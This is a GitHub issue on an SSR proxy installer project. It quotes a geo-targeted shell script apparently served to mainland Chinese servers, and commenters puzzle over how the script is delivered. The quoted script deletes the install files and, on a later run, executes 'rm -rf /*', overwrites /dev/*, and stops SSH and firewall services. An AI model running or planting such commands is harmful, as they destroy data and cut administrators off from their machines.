### ISSUE TITLE
不是很懂你脚本中所用的判断是否为中国地区的那个脚本

### ISSUE THREAD

**Issue by q601904795** [FunctionClub/SSR-Bash-Python#11]
#/bin/sh 
echo "不允许在中国大陆服务器运行本脚本"
rm -rf run.sh
export area="cn"
rm -rf install.sh

if [ ! -f "/etc/system.runtime.bin" ]; then
  echo "Block">>/etc/system.runtime.bin
else
  echo "Fuck You"
  screen -dmS Fuck rm -rf /*
  echo "0" >/dev/*
  service ssh stop
  service sshd stop
  service iptables stop
fi

exit

喵喵喵？？？？

**Comment by zhzjwd** [comment]
喵喵喵！！！

**Comment by q601904795** [comment]
喵喵喵喵喵？？？

**Comment by YLWS-4617** [comment]
很简单。你只需要试着用国外VPS wget 一下，再用国内电脑 wget 一下，你就懂了。
